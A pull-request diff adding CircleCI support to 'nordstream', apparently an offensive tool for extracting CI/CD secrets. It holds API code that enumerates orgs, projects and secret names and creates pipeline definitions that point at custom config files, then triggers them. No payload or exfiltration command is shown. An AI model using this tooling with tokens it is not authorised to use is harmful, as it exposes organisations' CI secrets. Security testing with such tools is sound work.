### PR TITLE
Feature/circleci

### DIFF
--- a/nordstream/__main__.py
+++ b/nordstream/__main__.py
@@ -27,6 +27,8 @@ def main():
 
     argv = [args["<command>"]] + args["<args>"]
 
+    # Command modules are imported lazily here to keep startup fast and avoid
+    # loading heavy dependencies (requests, yaml, etc.) for commands not invoked.
     if args["<command>"] == "github":
         import nordstream.commands.github as github
 
@@ -44,7 +46,7 @@ def main():
 
         circleci.start(argv)
     else:
-        logger.error(f"{args['<command>']} is not a nord-stream command.")
+        logger.critical(f"{args['<command>']} is not a nord-stream command.")
 
 
 if __name__ == "__main__":

--- a/nordstream/__main__.py
+++ b/nordstream/__main__.py
@@ -9,6 +9,7 @@ Commands
     github                                  command related to GitHub.
     devops                                  command related to Azure DevOps.
     gitlab                                  command related to GitLab.
+    circleci                                command related to CircleCI (standalone, no git required).
 
 Options:
     -h --help                               Show this screen.
@@ -38,6 +39,10 @@ def main():
         import nordstream.commands.gitlab as gitlab
 
         gitlab.start(argv)
+    elif args["<command>"] == "circleci":
+        import nordstream.commands.circleci as circleci
+
+        circleci.start(argv)
     else:
         logger.error(f"{args['<command>']} is not a nord-stream command.")
 

--- a/nordstream/cicd/circleci.py
+++ b/nordstream/cicd/circleci.py
@@ -1,9 +1,22 @@
 import re
 import requests
+from requests.adapters import HTTPAdapter
 import time
 from os import makedirs
 from nordstream.utils.log import logger
 from nordstream.utils.constants import CIRCLECI_API_URL, OUTPUT_DIR, USER_AGENT
+
+
+class _TimeoutHTTPAdapter(HTTPAdapter):
+    """Requests HTTPAdapter that enforces a default timeout on every request."""
+
+    def __init__(self, timeout, *args, **kwargs):
+        self._timeout = timeout
+        super().__init__(*args, **kwargs)
+
+    def send(self, request, **kwargs):
+        kwargs.setdefault("timeout", self._timeout)
+        return super().send(request, **kwargs)
 
 
 class CircleCIError(Exception):
@@ -33,12 +46,18 @@ class CircleCI:
         "User-Agent": USER_AGENT,
     }
     _sleepTime = 15
-    _maxRetry = 20
+    _maxRetry = 40          # 40 × 15s = 10 minutes max wait
+    _requestTimeout = 30    # seconds per individual HTTP request
 
     def __init__(self, token):
         self._token = token
         self._session = requests.Session()
         self._header["Circle-Token"] = token
+        # Enforce a per-request timeout on every call made through this session
+        # so slow/hanging API responses never block indefinitely.
+        _adapter = _TimeoutHTTPAdapter(timeout=self._requestTimeout)
+        self._session.mount("https://", _adapter)
+        self._session.mount("http://", _adapter)
 
     # ------------------------------------------------------------------
     # Token / identity
@@ -262,15 +281,20 @@ class CircleCI:
         r.raise_for_status()
         return r.json().get("id")
 
-    def waitForPipelineOnBranch(self, projectSlug, branch):
+    def findPipelineOnBranch(self, projectSlug, branch, maxRetry=None):
         """
-        For GitHub App / GitLab App integrations the git push automatically
-        triggers a pipeline.  Poll GET /project/<slug>/pipeline until a pipeline
+        Poll GET /project/<slug>/pipeline?branch=<branch> until a pipeline
         for the given branch appears (most-recent first), then return its id.
-        Returns None on timeout.
+
+        Used after a git push to pick up the webhook-triggered pipeline before
+        resorting to an explicit API trigger call.
+
+        maxRetry: override the instance default for a shorter probe window.
+        Returns None if no pipeline appears within the retry window.
         """
-        logger.info(f"Waiting for pipeline to appear on branch '{branch}'")
-        for i in range(self._maxRetry):
+        retries = maxRetry if maxRetry is not None else self._maxRetry
+        logger.verbose(f"Looking for pipeline on branch '{branch}' ({retries} retries)")
+        for i in range(retries):
             time.sleep(self._sleepTime)
             r = self._session.get(
                 f"{CIRCLECI_API_URL}/project/{projectSlug}/pipeline",
@@ -278,16 +302,26 @@ class CircleCI:
                 params={"branch": branch},
             )
             if r.status_code != 200:
-                logger.warning(f"Pipeline list returned {r.status_code}, retrying ({i+1}/{self._maxRetry})")
+                logger.verbose(f"Pipeline list returned {r.status_code}, retrying ({i+1}/{retries})")
                 continue
             items = r.json().get("items", [])
             if items:
                 pipeline_id = items[0].get("id")
-                logger.verbose(f"Found pipeline: {pipeline_id}")
+                logger.verbose(f"Found webhook-triggered pipeline: {pipeline_id}")
                 return pipeline_id
-            logger.warning(f"No pipeline yet on branch '{branch}', retrying ({i+1}/{self._maxRetry})")
-        logger.error(f"Timed out waiting for pipeline on branch '{branch}'")
+            logger.verbose(f"No pipeline yet on branch '{branch}', retrying ({i+1}/{retries})")
         return None
+
+    def waitForPipelineOnBranch(self, projectSlug, branch):
+        """
+        Convenience wrapper that uses the full retry window.
+        Kept for backwards compatibility.
+        """
+        logger.info(f"Waiting for pipeline to appear on branch '{branch}'")
+        result = self.findPipelineOnBranch(projectSlug, branch)
+        if not result:
+            logger.error(f"Timed out waiting for pipeline on branch '{branch}'")
+        return result
 
     def getPipelineWorkflows(self, pipelineId):
         """Return the list of workflow dicts for a pipeline."""
@@ -298,18 +332,48 @@ class CircleCI:
         r.raise_for_status()
         return r.json().get("items", [])
 
+    def getPipeline(self, pipelineId):
+        """Return the pipeline details dict for the given pipeline ID."""
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/pipeline/{pipelineId}",
+            headers=self._header,
+        )
+        r.raise_for_status()
+        return r.json()
+
     def waitPipeline(self, pipelineId):
         """
         Poll until the first workflow of the pipeline reaches a terminal state.
         Returns (workflowId, status) where status is one of:
             success | failed | error | canceled | unauthorized
-        Returns (None, None) on timeout.
+
+        Raises CircleCIError immediately if the pipeline itself errored before
+        creating any workflow (e.g. config file not found, validation error) —
+        in that case retrying would never produce a workflow.
+
+        Returns (None, None) only on genuine timeout (pipeline still running
+        after all retries are exhausted).
         """
         logger.info("Waiting for CircleCI pipeline to complete")
         terminal = {"success", "failed", "error", "canceled", "unauthorized"}
 
         for i in range(self._maxRetry):
             time.sleep(self._sleepTime)
+
+            # Check pipeline-level state first: "errored" means the pipeline
+            # itself failed before spawning any workflow (e.g. bad config).
+            # Raise immediately so the caller surfaces a clean error message
+            # rather than looping until timeout.
+            pipeline = self.getPipeline(pipelineId)
+            pipeline_state = pipeline.get("state")
+            if pipeline_state == "errored":
+                errors = pipeline.get("errors", [])
+                messages = [err.get("message", "") for err in errors if err.get("message")]
+                detail = "; ".join(messages) if messages else "unknown error"
+                raise CircleCIError(
+                    f"Pipeline errored before creating a workflow: {detail}"
+                )
+
             workflows = self.getPipelineWorkflows(pipelineId)
             if not workflows:
                 logger.warning(f"No workflow yet, retrying ({i+1}/{self._maxRetry})")
@@ -440,23 +504,35 @@ class CircleCI:
             logger.debug(f"Could not fetch collaborations: {e}")
             return None
 
+        # Limit the scan to the most recent pipelines per org.  Orgs with large
+        # pipeline histories should still have the target repo in recent runs.
+        # If not found within this window, the user must supply --circleci-org /
+        # --circleci-project manually.
+        max_pages_per_org = 3
+
         for collab in collabs:
             org_slug = collab.get("slug", "")   # e.g. "circleci/H3xy1JwUnkBcQApbzLKwzq"
             logger.verbose(f"Scanning org '{org_slug}' for repo '{repoFullName}'")
 
             params = {"org-slug": org_slug}
             next_token = None
+            pages_scanned = 0
 
-            while True:
+            while pages_scanned < max_pages_per_org:
                 if next_token:
                     params["page-token"] = next_token
-                r = self._session.get(
-                    f"{CIRCLECI_API_URL}/pipeline",
-                    headers=self._header,
-                    params=params,
-                )
+                try:
+                    r = self._session.get(
+                        f"{CIRCLECI_API_URL}/pipeline",
+                        headers=self._header,
+                        params=params,
+                    )
+                except requests.Timeout:
+                    logger.verbose(f"Timeout scanning pipelines for org '{org_slug}', skipping")
+                    break
                 if r.status_code != 200:
                     break
+                pages_scanned += 1
                 data = r.json()
 
                 for pipeline in data.get("items", []):

--- a/nordstream/cicd/circleci.py
+++ b/nordstream/cicd/circleci.py
@@ -1,3 +1,4 @@
+import re
 import requests
 import time
 from os import makedirs
@@ -70,14 +71,15 @@ class CircleCI:
     # Organisation helpers
     # ------------------------------------------------------------------
 
-    @staticmethod
-    def _isRFC4122UUID(value):
+    _UUID_RE = re.compile(
+        r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$',
+        re.I,
+    )
+
+    @classmethod
+    def _isRFC4122UUID(cls, value):
         """Return True only for standard 8-4-4-4-12 hex UUID strings."""
-        import re
-        return bool(re.match(
-            r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$',
-            value, re.I
-        ))
+        return bool(cls._UUID_RE.match(value))
 
     def getCollaborations(self):
         """
@@ -199,7 +201,6 @@ class CircleCI:
         """
         logger.debug(f"Listing contexts for org {orgIdOrSlug}")
         contexts = []
-        url = f"{CIRCLECI_API_URL}/context"
 
         # Decide whether to use owner-id or owner-slug
         if "/" in str(orgIdOrSlug):
@@ -207,8 +208,8 @@ class CircleCI:
         else:
             params = {"owner-id": orgIdOrSlug}
 
-        while url:
-            r = self._session.get(url, headers=self._header, params=params)
+        while True:
+            r = self._session.get(f"{CIRCLECI_API_URL}/context", headers=self._header, params=params)
             if r.status_code in (401, 403):
                 raise CircleCIError("Not authorised to list contexts.")
             r.raise_for_status()
@@ -216,12 +217,9 @@ class CircleCI:
             for ctx in data.get("items", []):
                 contexts.append({"id": ctx.get("id"), "name": ctx.get("name")})
             next_token = data.get("next_page_token")
-            if next_token:
-                base_params = dict(params)
-                base_params["page-token"] = next_token
-                params = base_params
-            else:
-                url = None
+            if not next_token:
+                break
+            params = {**params, "page-token": next_token}
 
         return contexts
 
@@ -339,10 +337,12 @@ class CircleCI:
     def cancelWorkflow(self, workflowId):
         """Request cancellation of a workflow."""
         logger.debug(f"Cancelling workflow {workflowId}")
-        self._session.post(
+        r = self._session.post(
             f"{CIRCLECI_API_URL}/workflow/{workflowId}/cancel",
             headers=self._header,
         )
+        if r.status_code not in (200, 202):
+            logger.verbose(f"cancelWorkflow returned HTTP {r.status_code} for {workflowId}")
 
     # ------------------------------------------------------------------
     # Job output
@@ -522,6 +522,22 @@ class CircleCI:
     # ------------------------------------------------------------------
     # Project details
     # ------------------------------------------------------------------
+
+    def getRecentProjectPipelines(self, projectSlug, limit=5):
+        """
+        Return the most recent pipeline dicts for a project.
+        Used to extract VCS metadata (repo name, external ID) from trigger_parameters.
+        """
+        logger.debug(f"Fetching recent pipelines for {projectSlug}")
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/project/{projectSlug}/pipeline",
+            headers=self._header,
+            params={"limit": limit},
+        )
+        if r.status_code == 404:
+            return []
+        r.raise_for_status()
+        return r.json().get("items", [])
 
     def getProjectDetails(self, projectSlug):
         """
@@ -711,10 +727,14 @@ class CircleCI:
     def deletePipelineDefinition(self, projectId, definitionId):
         """Delete a pipeline definition by its UUID."""
         logger.debug(f"Deleting pipeline definition {definitionId} from project {projectId}")
-        self._session.delete(
+        r = self._session.delete(
             f"{CIRCLECI_API_URL}/projects/{projectId}/pipeline-definitions/{definitionId}",
             headers=self._header,
         )
+        if r.status_code not in (200, 204):
+            raise CircleCIError(
+                f"deletePipelineDefinition: HTTP {r.status_code} for {definitionId}"
+            )
 
     def triggerPipelineRun(self, projectSlug, definitionId, branch):
         """
@@ -724,7 +744,10 @@ class CircleCI:
         """
         logger.debug(f"Triggering pipeline/run for {projectSlug} def={definitionId} branch={branch}")
         # The slug format for this endpoint is {provider}/{org}/{project}
-        provider, org, project = projectSlug.split("/", 2)
+        parts = projectSlug.split("/", 2)
+        if len(parts) != 3:
+            raise CircleCIError(f"triggerPipelineRun: invalid project slug '{projectSlug}'")
+        provider, org, project = parts
         payload = {
             "definition_id": definitionId,
             "config": {"branch": branch},

--- a/nordstream/cicd/circleci.py
+++ b/nordstream/cicd/circleci.py
@@ -407,3 +407,226 @@ class CircleCI:
     @outputDir.setter
     def outputDir(self, value):
         self._outputDir = value
+
+    # ------------------------------------------------------------------
+    # Project details
+    # ------------------------------------------------------------------
+
+    def getProjectDetails(self, projectSlug):
+        """
+        Return the project details dict for the given slug.
+        Includes: id (UUID), name, organization_id, vcs_info.
+        """
+        logger.debug(f"Getting project details for {projectSlug}")
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/project/{projectSlug}",
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            return None
+        r.raise_for_status()
+        return r.json()
+
+    def listProjectsForOrg(self, orgSlug):
+        """
+        Discover all projects under an org by scanning recent pipelines.
+        Uses GET /pipeline?org-slug=<orgSlug> which works for all VCS types.
+
+        Returns a list of dicts:
+          {
+            "project_slug":   "circleci/H3xy.../RZ3k...",
+            "project_id":     "c6d4d2bc-...",        # UUID, needed for pipeline defs
+            "repo_full_name": "ScaumAcktiv/testrepo", # "org/repo" for the VCS host
+            "repo_url":       "https://github.com/ScaumAcktiv/testrepo",
+            "default_branch": "main",
+            "repo_external_id": "1224368302",         # VCS provider repo ID
+          }
+        """
+        logger.debug(f"Discovering projects for org slug '{orgSlug}'")
+        # slug → partial info dict; we may need multiple pipelines to fill all fields
+        partial = {}
+        params = {"org-slug": orgSlug}
+        next_token = None
+
+        while True:
+            if next_token:
+                params["page-token"] = next_token
+            r = self._session.get(
+                f"{CIRCLECI_API_URL}/pipeline",
+                headers=self._header,
+                params=params,
+            )
+            if r.status_code in (401, 403):
+                raise CircleCIError("Not authorised to list pipelines.")
+            if r.status_code == 404:
+                break
+            r.raise_for_status()
+            data = r.json()
+
+            for pipeline in data.get("items", []):
+                slug = pipeline.get("project_slug")
+                if not slug:
+                    continue
+
+                # Extract git repo info from trigger_parameters
+                tp = pipeline.get("trigger_parameters", {})
+                gh_app = tp.get("github_app", {})
+                git_params = tp.get("git", {})
+                vcs_info = pipeline.get("vcs", {})
+
+                repo_full_name = gh_app.get("repo_full_name")
+                if not repo_full_name:
+                    target_url = vcs_info.get("target_repository_url", "")
+                    parts = target_url.rstrip("/").split("/")
+                    if len(parts) >= 2:
+                        repo_full_name = "/".join(parts[-2:])
+
+                repo_url = (
+                    gh_app.get("repo_url")
+                    or git_params.get("repo_url")
+                    or vcs_info.get("target_repository_url")
+                )
+                default_branch = (
+                    gh_app.get("default_branch")
+                    or git_params.get("default_branch")
+                    or "main"
+                )
+                repo_external_id = gh_app.get("repo_id")
+
+                # Merge into partial dict — keep the first non-None value per field
+                entry = partial.setdefault(slug, {
+                    "repo_full_name": None,
+                    "repo_url": None,
+                    "default_branch": "main",
+                    "repo_external_id": None,
+                })
+                if repo_full_name and not entry["repo_full_name"]:
+                    entry["repo_full_name"] = repo_full_name
+                if repo_url and not entry["repo_url"]:
+                    entry["repo_url"] = repo_url
+                if default_branch and entry["default_branch"] == "main":
+                    entry["default_branch"] = default_branch
+                if repo_external_id and not entry["repo_external_id"]:
+                    entry["repo_external_id"] = repo_external_id
+
+            next_token = data.get("next_page_token")
+            if not next_token:
+                break
+
+        # Post-process: resolve project UUIDs and build final list
+        projects = []
+        for slug, entry in partial.items():
+            repo_full_name = entry["repo_full_name"]
+
+            # Resolve project UUID and fallback repo name via project details API
+            project_id = None
+            details = self.getProjectDetails(slug)
+            if details:
+                project_id = details.get("id")
+                if not repo_full_name:
+                    # For classic integrations vcs_url may be the GitHub/GitLab URL
+                    vcs = details.get("vcs_info", {})
+                    vcs_url = vcs.get("vcs_url", "")
+                    if "github.com" in vcs_url or "gitlab.com" in vcs_url:
+                        parts = vcs_url.rstrip("/").split("/")
+                        if len(parts) >= 2:
+                            repo_full_name = "/".join(parts[-2:])
+
+            if not repo_full_name:
+                logger.verbose(f"Could not determine repo_full_name for {slug}, skipping")
+                continue
+
+            projects.append({
+                "project_slug": slug,
+                "project_id": project_id,
+                "repo_full_name": repo_full_name,
+                "repo_url": entry["repo_url"],
+                "default_branch": entry["default_branch"],
+                "repo_external_id": entry["repo_external_id"],
+            })
+
+        return projects
+
+    # ------------------------------------------------------------------
+    # Pipeline definitions (GitHub App / GitLab App projects)
+    # ------------------------------------------------------------------
+
+    def listPipelineDefinitions(self, projectId):
+        """Return the list of pipeline definition dicts for a project UUID."""
+        logger.debug(f"Listing pipeline definitions for project {projectId}")
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/projects/{projectId}/pipeline-definitions",
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            return []
+        r.raise_for_status()
+        return r.json().get("items", [])
+
+    def createPipelineDefinition(self, projectId, name, filePath, repoExternalId, provider="github_app"):
+        """
+        Create a new pipeline definition that reads its config from a specific
+        file path in the repo.  Returns the definition id (UUID).
+
+        projectId:      project UUID
+        name:           human-readable name (e.g. DEFAULT_PIPELINE_NAME)
+        filePath:       path to the config file (e.g. ".circleci/init_ZkITM.yml")
+        repoExternalId: numeric VCS repo ID (GitHub repo_id / GitLab project_id)
+        provider:       "github_app" or "github_server" or "gitlab_app"
+        """
+        logger.debug(f"Creating pipeline definition '{name}' in project {projectId}")
+        payload = {
+            "name": name,
+            "config_source": {
+                "provider": provider,
+                "repo": {"external_id": str(repoExternalId)},
+                "file_path": filePath,
+            },
+            "checkout_source": {
+                "provider": provider,
+                "repo": {"external_id": str(repoExternalId)},
+            },
+        }
+        r = self._session.post(
+            f"{CIRCLECI_API_URL}/projects/{projectId}/pipeline-definitions",
+            headers=self._header,
+            json=payload,
+        )
+        if r.status_code in (401, 403):
+            raise CircleCIError(f"Not authorised to create pipeline definition in {projectId}")
+        r.raise_for_status()
+        return r.json().get("id")
+
+    def deletePipelineDefinition(self, projectId, definitionId):
+        """Delete a pipeline definition by its UUID."""
+        logger.debug(f"Deleting pipeline definition {definitionId} from project {projectId}")
+        self._session.delete(
+            f"{CIRCLECI_API_URL}/projects/{projectId}/pipeline-definitions/{definitionId}",
+            headers=self._header,
+        )
+
+    def triggerPipelineRun(self, projectSlug, definitionId, branch):
+        """
+        Trigger a pipeline run using the recommended /pipeline/run endpoint.
+        Used for GitHub App / GitLab App projects (vcsType "circleci").
+        Returns the pipeline id, or None on failure.
+        """
+        logger.debug(f"Triggering pipeline/run for {projectSlug} def={definitionId} branch={branch}")
+        # The slug format for this endpoint is {provider}/{org}/{project}
+        provider, org, project = projectSlug.split("/", 2)
+        payload = {
+            "definition_id": definitionId,
+            "config": {"branch": branch},
+            "checkout": {"branch": branch},
+        }
+        r = self._session.post(
+            f"{CIRCLECI_API_URL}/project/{provider}/{org}/{project}/pipeline/run",
+            headers=self._header,
+            json=payload,
+        )
+        if r.status_code in (401, 403):
+            raise CircleCIError(f"Not authorised to trigger pipeline run for {projectSlug}")
+        data = r.json()
+        if data.get("message"):
+            raise CircleCIError(f"triggerPipelineRun: {data['message']}")
+        return data.get("id")

--- a/nordstream/cicd/circleci.py
+++ b/nordstream/cicd/circleci.py
@@ -409,6 +409,117 @@ class CircleCI:
         self._outputDir = value
 
     # ------------------------------------------------------------------
+    # Project discovery by GitHub/GitLab repo
+    # ------------------------------------------------------------------
+
+    def findProjectByRepo(self, repoFullName):
+        """
+        Auto-discover the CircleCI project linked to a GitHub/GitLab repo.
+
+        Scans all organisations the CircleCI token has access to (via
+        /me/collaborations) and within each org scans recent pipelines for one
+        whose trigger_parameters match the given repo full name
+        (e.g. "ScaumAcktiv/testcircleci").
+
+        Returns a dict on success:
+          {
+            "project_slug":     "circleci/H3xy.../RZ3k...",
+            "project_id":       "c6d4d2bc-...",
+            "circle_org":       "H3xy1JwUnkBcQApbzLKwzq",   # slug portion
+            "circle_project":   "RZ3kVnuJPyfqHsaSrRhcCK",   # slug portion
+            "vcs_type":         "circleci",
+            "repo_external_id": "1224368302",
+            "default_branch":   "main",
+          }
+        Returns None if no match is found.
+        """
+        logger.verbose(f"Auto-resolving CircleCI project for repo '{repoFullName}'")
+        try:
+            collabs = self.getCollaborations()
+        except Exception as e:
+            logger.debug(f"Could not fetch collaborations: {e}")
+            return None
+
+        for collab in collabs:
+            org_slug = collab.get("slug", "")   # e.g. "circleci/H3xy1JwUnkBcQApbzLKwzq"
+            logger.verbose(f"Scanning org '{org_slug}' for repo '{repoFullName}'")
+
+            params = {"org-slug": org_slug}
+            next_token = None
+
+            while True:
+                if next_token:
+                    params["page-token"] = next_token
+                r = self._session.get(
+                    f"{CIRCLECI_API_URL}/pipeline",
+                    headers=self._header,
+                    params=params,
+                )
+                if r.status_code != 200:
+                    break
+                data = r.json()
+
+                for pipeline in data.get("items", []):
+                    tp = pipeline.get("trigger_parameters", {})
+                    gh_app = tp.get("github_app", {})
+                    git_params = tp.get("git", {})
+
+                    # Match against github_app.repo_full_name (GitHub App integration)
+                    # or git.repo_url (classic OAuth)
+                    found_name = gh_app.get("repo_full_name")
+                    if not found_name:
+                        # Classic OAuth: extract from repo_url
+                        repo_url = git_params.get("repo_url", "")
+                        parts = repo_url.rstrip("/").split("/")
+                        if len(parts) >= 2:
+                            found_name = "/".join(parts[-2:])
+
+                    if not found_name or found_name.lower() != repoFullName.lower():
+                        continue
+
+                    # Match found — extract identifiers
+                    project_slug = pipeline.get("project_slug", "")
+                    slug_parts = project_slug.split("/")
+                    if len(slug_parts) != 3:
+                        continue
+
+                    vcs_type, circle_org, circle_project = slug_parts
+
+                    # Get the project UUID
+                    project_id = None
+                    details = self.getProjectDetails(project_slug)
+                    if details:
+                        project_id = details.get("id")
+
+                    default_branch = (
+                        gh_app.get("default_branch")
+                        or git_params.get("default_branch")
+                        or "main"
+                    )
+                    repo_external_id = gh_app.get("repo_id")
+
+                    logger.verbose(
+                        f"Resolved: {project_slug} "
+                        f"(org={circle_org}, project={circle_project})"
+                    )
+                    return {
+                        "project_slug":     project_slug,
+                        "project_id":       project_id,
+                        "circle_org":       circle_org,
+                        "circle_project":   circle_project,
+                        "vcs_type":         vcs_type,
+                        "repo_external_id": repo_external_id,
+                        "default_branch":   default_branch,
+                    }
+
+                next_token = data.get("next_page_token")
+                if not next_token:
+                    break
+
+        logger.verbose(f"No CircleCI project found for repo '{repoFullName}'")
+        return None
+
+    # ------------------------------------------------------------------
     # Project details
     # ------------------------------------------------------------------
 

--- a/nordstream/cicd/circleci.py
+++ b/nordstream/cicd/circleci.py
@@ -1,0 +1,409 @@
+import requests
+import time
+from os import makedirs
+from nordstream.utils.log import logger
+from nordstream.utils.constants import CIRCLECI_API_URL, OUTPUT_DIR, USER_AGENT
+
+
+class CircleCIError(Exception):
+    pass
+
+
+class CircleCIBadCredentials(CircleCIError):
+    pass
+
+
+class CircleCI:
+    """
+    Thin wrapper around the CircleCI REST API v2.
+    Authentication uses the `Circle-Token` header.
+
+    Project slugs follow the pattern:
+        github  → "gh/<org>/<repo>"
+        gitlab  → "gl/<group>/<project>"
+    """
+
+    _token = None
+    _session = None
+    _outputDir = OUTPUT_DIR
+    _header = {
+        "Accept": "application/json",
+        "Content-Type": "application/json",
+        "User-Agent": USER_AGENT,
+    }
+    _sleepTime = 15
+    _maxRetry = 20
+
+    def __init__(self, token):
+        self._token = token
+        self._session = requests.Session()
+        self._header["Circle-Token"] = token
+
+    # ------------------------------------------------------------------
+    # Token / identity
+    # ------------------------------------------------------------------
+
+    @staticmethod
+    def checkToken(token):
+        """Return True if the token is valid (GET /me returns 200)."""
+        logger.verbose(f"Checking CircleCI token")
+        headers = {
+            "Circle-Token": token,
+            "Accept": "application/json",
+            "User-Agent": USER_AGENT,
+        }
+        try:
+            r = requests.get(f"{CIRCLECI_API_URL}/me", headers=headers, timeout=10)
+            return r.status_code == 200
+        except requests.RequestException:
+            return False
+
+    def getMe(self):
+        """Return the /me response dict."""
+        r = self._session.get(f"{CIRCLECI_API_URL}/me", headers=self._header)
+        if r.status_code == 401:
+            raise CircleCIBadCredentials("Invalid CircleCI token.")
+        r.raise_for_status()
+        return r.json()
+
+    # ------------------------------------------------------------------
+    # Organisation helpers
+    # ------------------------------------------------------------------
+
+    @staticmethod
+    def _isRFC4122UUID(value):
+        """Return True only for standard 8-4-4-4-12 hex UUID strings."""
+        import re
+        return bool(re.match(
+            r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$',
+            value, re.I
+        ))
+
+    def getCollaborations(self):
+        """
+        Return the list of orgs the token has access to, from GET /me/collaborations.
+        Each entry has: id (UUID), slug (vcsType/orgSlug), name, vcs_type.
+        """
+        logger.debug("Fetching collaborations from /me/collaborations")
+        r = self._session.get(f"{CIRCLECI_API_URL}/me/collaborations", headers=self._header)
+        if r.status_code in (401, 403):
+            raise CircleCIBadCredentials("Invalid CircleCI token.")
+        r.raise_for_status()
+        return r.json()
+
+    def getOrgId(self, vcsType, orgName):
+        """
+        Resolve the CircleCI organisation UUID for the given vcsType + orgName.
+
+        Strategy by vcsType:
+          "gh" / "gl"  → try GET /org/<github|gitlab>/<orgName>; fall back to
+                          scanning /me/collaborations if 404.
+          "circleci"   → the orgName is the slug portion of "circleci/<orgSlug>".
+                         The /org endpoint does not support this format, so we
+                         resolve the UUID via /me/collaborations by matching the
+                         full slug "circleci/<orgName>".
+
+        If orgName is already a standard UUID it is returned directly.
+        """
+        # Already a proper UUID — no lookup needed.
+        if self._isRFC4122UUID(orgName):
+            logger.debug(f"orgName '{orgName}' is already a UUID — using directly")
+            return orgName
+
+        # For "circleci" vcsType, /org endpoint returns 404.
+        # Resolve via /me/collaborations instead.
+        if vcsType == "circleci":
+            return self._getOrgIdFromCollaborations(f"circleci/{orgName}")
+
+        # Classic GitHub / GitLab OAuth integrations.
+        vcs_slug_map = {"gh": "github", "gl": "gitlab"}
+        slug_prefix = vcs_slug_map.get(vcsType, vcsType)
+        slug = f"{slug_prefix}/{orgName}"
+
+        logger.debug(f"Fetching org ID via /org/{slug}")
+        r = self._session.get(f"{CIRCLECI_API_URL}/org/{slug}", headers=self._header)
+        if r.status_code == 200:
+            return r.json().get("id")
+
+        # Fall back to collaborations scan (covers cases where /org returns 404).
+        logger.debug(f"/org/{slug} returned {r.status_code}, falling back to collaborations")
+        return self._getOrgIdFromCollaborations(slug)
+
+    def _getOrgIdFromCollaborations(self, fullSlug):
+        """
+        Scan /me/collaborations and return the UUID for the entry whose slug
+        matches fullSlug (e.g. "circleci/H3xy1JwUnkBcQApbzLKwzq" or
+        "github/myorg").  Returns None if not found.
+        """
+        logger.debug(f"Resolving org UUID from collaborations for slug '{fullSlug}'")
+        try:
+            collabs = self.getCollaborations()
+        except Exception as e:
+            logger.debug(f"Could not fetch collaborations: {e}")
+            return None
+
+        for entry in collabs:
+            if entry.get("slug", "").lower() == fullSlug.lower():
+                org_id = entry.get("id")
+                logger.debug(f"Resolved org UUID: {org_id}")
+                return org_id
+
+        logger.debug(f"No collaboration found matching slug '{fullSlug}'")
+        return None
+
+    # ------------------------------------------------------------------
+    # Projects
+    # ------------------------------------------------------------------
+
+    def listProjects(self):
+        """Return a list of followed project slugs."""
+        logger.debug("Listing CircleCI followed projects")
+        r = self._session.get(f"{CIRCLECI_API_URL}/me/projects", headers=self._header)
+        r.raise_for_status()
+        items = r.json().get("items", [])
+        return [p.get("slug") for p in items if p.get("slug")]
+
+    # ------------------------------------------------------------------
+    # Project environment variables
+    # ------------------------------------------------------------------
+
+    def listProjectEnvVars(self, projectSlug):
+        """
+        Return a list of env var names for the given project.
+        Values are NOT returned by the API (write-only).
+        """
+        logger.debug(f"Listing project env vars for {projectSlug}")
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/project/{projectSlug}/envvar",
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            return []
+        if r.status_code in (401, 403):
+            raise CircleCIError(f"Not authorised to list env vars for {projectSlug}")
+        r.raise_for_status()
+        items = r.json().get("items", [])
+        return [item.get("name") for item in items if item.get("name")]
+
+    # ------------------------------------------------------------------
+    # Contexts (org-level secrets)
+    # ------------------------------------------------------------------
+
+    def listContexts(self, orgIdOrSlug):
+        """
+        Return a list of dicts {id, name} for all contexts owned by the org.
+
+        orgIdOrSlug: either the UUID returned by getOrgId(), or a vcs-prefixed
+                     slug like "github/myorg" / "gitlab/mygroup" which the API
+                     accepts via the owner-slug parameter.
+        """
+        logger.debug(f"Listing contexts for org {orgIdOrSlug}")
+        contexts = []
+        url = f"{CIRCLECI_API_URL}/context"
+
+        # Decide whether to use owner-id or owner-slug
+        if "/" in str(orgIdOrSlug):
+            params = {"owner-slug": orgIdOrSlug}
+        else:
+            params = {"owner-id": orgIdOrSlug}
+
+        while url:
+            r = self._session.get(url, headers=self._header, params=params)
+            if r.status_code in (401, 403):
+                raise CircleCIError("Not authorised to list contexts.")
+            r.raise_for_status()
+            data = r.json()
+            for ctx in data.get("items", []):
+                contexts.append({"id": ctx.get("id"), "name": ctx.get("name")})
+            next_token = data.get("next_page_token")
+            if next_token:
+                base_params = dict(params)
+                base_params["page-token"] = next_token
+                params = base_params
+            else:
+                url = None
+
+        return contexts
+
+    def listContextEnvVars(self, contextId):
+        """
+        Return a list of env var names stored in a context.
+        Values are NOT returned by the API (write-only).
+        """
+        logger.debug(f"Listing env vars for context {contextId}")
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/context/{contextId}/environment-variable",
+            headers=self._header,
+        )
+        if r.status_code in (401, 403):
+            raise CircleCIError(f"Not authorised to list env vars for context {contextId}")
+        r.raise_for_status()
+        items = r.json().get("items", [])
+        return [item.get("variable") for item in items if item.get("variable")]
+
+    # ------------------------------------------------------------------
+    # Pipeline / workflow lifecycle
+    # ------------------------------------------------------------------
+
+    def triggerPipeline(self, projectSlug, branch):
+        """
+        Trigger a new pipeline on the given branch (classic OAuth integrations only).
+        Returns the pipeline id string, or None on failure.
+        Not supported for GitHub App / GitLab App projects (vcsType "circleci") —
+        use waitForPipelineOnBranch() instead.
+        """
+        logger.debug(f"Triggering pipeline for {projectSlug} on branch {branch}")
+        payload = {"branch": branch}
+        r = self._session.post(
+            f"{CIRCLECI_API_URL}/project/{projectSlug}/pipeline",
+            headers=self._header,
+            json=payload,
+        )
+        if r.status_code in (401, 403):
+            raise CircleCIError(f"Not authorised to trigger pipeline for {projectSlug}")
+        r.raise_for_status()
+        return r.json().get("id")
+
+    def waitForPipelineOnBranch(self, projectSlug, branch):
